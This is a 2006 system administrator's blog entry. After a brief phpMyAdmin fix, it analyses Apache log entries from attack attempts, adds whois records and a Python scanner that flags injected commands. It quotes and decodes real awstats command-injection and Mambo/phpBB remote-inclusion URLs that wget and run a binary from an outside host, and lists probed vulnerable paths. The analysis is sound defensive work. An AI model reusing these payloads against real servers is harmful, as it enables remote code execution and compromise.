SYSMGR

We're a bunch of computers: Diana, Daphne and Dido, called the 3D-cluster, running OpenVMS; Io, running OpenVMS as well (in some obscure role in the network); Aphrodite, Athene and Irene running Windows XP Pro (SP2, of course); and Cerberus at the edge of the network, with Charon, also running Linux, as standby. SYSMGR takes care of us.

Tuesday, March 28

28-Mar-2006

PHPMyAdmin works
That is: the issue is located and a work-around created. It's in the URL, which contains - at its end - the string:
&collation_connection=utf8_unicode_ci
and that's just what gives the error.
Changed that - in the browser address line - to read:
&collation_connection=utf8_general_ci
and behold: IT WORKS. No matter from where (don't think you can access it - it's somewhere else ;-)
Switching time
this weekend has once again proved to be a non-issue.
Too busy with other things
but just this morning I could have a look at the Apache logs. Found just two abuse attempts in ACCESS_LOG:

69.13.213.69 - - [22/Mar/2006:03:24:02 +0100]
GETs these URLs, or at least tries to (but gets 404 errors on each):

/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/index.php?option=com_content&do_pdf=1&id=1
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo

He's busy "hacking his way in", because this is his command in plain text:

on "awstats" he does:

echo;
echo YYY;
cd /tmp;
wget 83.16.187.6/cacti;
chmod +x cacti;
./cacti;
echo YYY;
echo

on the other lines:

http://83.16.187.6/cmd.gif?&cmd=
cd /tmp;
wget 83.16.187.6/cacti;
chmod 744 cacti;
./cacti;
echo YYY;
echo

Actually the same.
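The decoding done by hand above can be automated. What follows is an added example (my own, not code from this blog) that parses Apache combined-log lines, URL-decodes each query parameter and flags the two patterns seen in this log: a parameter whose value is a list of shell statements (the awstats configdir case) and a parameter pointing at a remote URL (the Mambo and phpBB include cases). The sample log lines are constructed, modelled on the entries above, with RFC 5737 documentation addresses in place of the real ones.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format, modelled on the
# entries in the post; addresses are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Mar/2006:03:24:02 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo HTTP/1.1" 404 290
192.0.2.10 - - [22/Mar/2006:03:24:03 +0100] "GET /mambo/index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.6/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.6/cacti;chmod%20744%20cacti;./cacti HTTP/1.1" 404 301
203.0.113.5 - - [26/Mar/2006:21:16:33 +0200] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.I)             # value is a remote URL
CMD_RE = re.compile(r'\b(wget|curl|chmod|perl)\b|\bcd /tmp')  # typical dropper verbs


def scan_line(line):
    """Return findings for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, when, _method, target, status = m.groups()
    path, _, query = target.partition('?')
    findings = []
    for param in query.split('&'):
        key, _, raw = param.partition('=')
        value = unquote(raw)   # %3b -> ';', %2f -> '/', %2b -> '+', %20 -> ' '
        base = dict(ip=ip, time=when, path=path, status=status, param=key, value=value)
        if REMOTE_RE.match(value):
            findings.append(dict(base, kind='remote-file-inclusion'))
        elif ';' in value and CMD_RE.search(value):
            # lay the injected command out one statement per entry, as the post does
            findings.append(dict(base, kind='command-injection',
                                 commands=[c.strip() for c in value.split(';')]))
    return findings


def scan_log(text):
    """Scan a whole access log (one request per line) and collect all findings."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['kind']:<23} {f['status']} {f['path']} [{f['param']}]")
        for cmd in f.get('commands', []):
            print('    ' + cmd)
```

The status column is kept on purpose: a 404 on every flagged request, as in this log, is the sign that the probed script is simply not there, which is what the rest of the post argues for.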
Who is this:

The source is 69.13.213.69:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 69.13.0.0 - 69.13.255.255
CIDR: 69.13.0.0/16
NetName: CIHS
NetHandle: NET-69-13-0-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment:
RegDate: 2002-12-04
Updated: 2003-10-10

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

But he references 83.16.187.6 (in the URL), so I guess it's likely to be his "home address":

inetnum: 83.16.187.4 - 83.16.187.7
netname: PRZEDSIBIORSTWOT
descr: PRZEDSIEBIORSTWO TELNET
descr: LOMZA
descr: POLAND
country: PL
admin-c: PZ823-RIPE
tech-c: TPHT
status: ASSIGNED PA
mnt-by: TPNET
source: RIPE # Filtered

role: TP S.A. Hostmaster
address: TP S.A. "POLPAK"
address: ul. Nowogrodzka 47A
address: 00-695 Warszawa
address: Poland
phone: +48 22 6252383
fax-no: +48 22 6225182
remarks: trouble: Network problems: hostmaster@tpnet.pl
remarks: trouble: Abuse and spam notification: abuse@tpnet.pl
remarks: trouble: DNS problems: dns@tpnet.pl
remarks: trouble: Routing problems: registry@tpnet.pl
admin-c: TK569-RIPE
tech-c: TK569-RIPE
tech-c: JS1838-RIPE
nic-hdl: TPHT
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
remarks: Please send spam and abuse notification only to abuse@tpnet.pl
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
mnt-by: TPNET
abuse-mailbox: abuse@tpnet.pl
source: RIPE # Filtered

Both will be notified.

The second is more straightforward - and good proof of why NOT to install in default locations:

85.10.193.134 - - [26/Mar/2006:21:16:33 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 316

No, of course that doesn't exist. Nor do these:

/modules/newbb_plus/class/forumpollrenderer.php
/WebCalendar/tools/send_reminders.php
/webcalendar/tools/send_reminders.php
/cal/tools/send_reminders.php
/Calendar/tools/send_reminders.php
/calendar/tools/send_reminders.php
/protection.php
/modules/AllMyGuests/signin.php
/classes.php
/extensions/moblog/moblog_lib.php
/modules/newbb_plus/class/forumpollrenderer.php
/mambo/index2.php?option=com_content&do_pdf=1&id=1
/mambo/index.php?option=com_content&do_pdf=1&id=1
/index2.php?option=com_content&do_pdf=1&id=1
/index.php?option=com_content&do_pdf=1&id=1
/cvs/index2.php?option=com_content&do_pdf=1&id=1
/cvs/index.php?option=com_content&do_pdf=1&id=1
/modules/coppermine/themes/default/theme.php
/awstats.pl
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/html/xmlrpc.php

This source is:

inetnum: 85.10.192.0 - 85.10.207.255
netname: HETZNER-RZ-NBG-NET
descr: Hetzner Online AG
descr: Datacenter Nuernberg
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

role: Hetzner Online AG - Contact Role
address: Hetzner Online AG
address: Industriestr. 6
address: D-91710 Gunzenhausen
address: Germany
phone: +49 9831 61 00 61
fax-no: +49 9831 61 00 62
e-mail: ripe@hetzner.de
remarks: *************************************************
remarks: * For spam/abuse/security issues please contact *
remarks: * abuse@hetzner.de , not this address *
remarks: *************************************************


Again a notification to be sent.
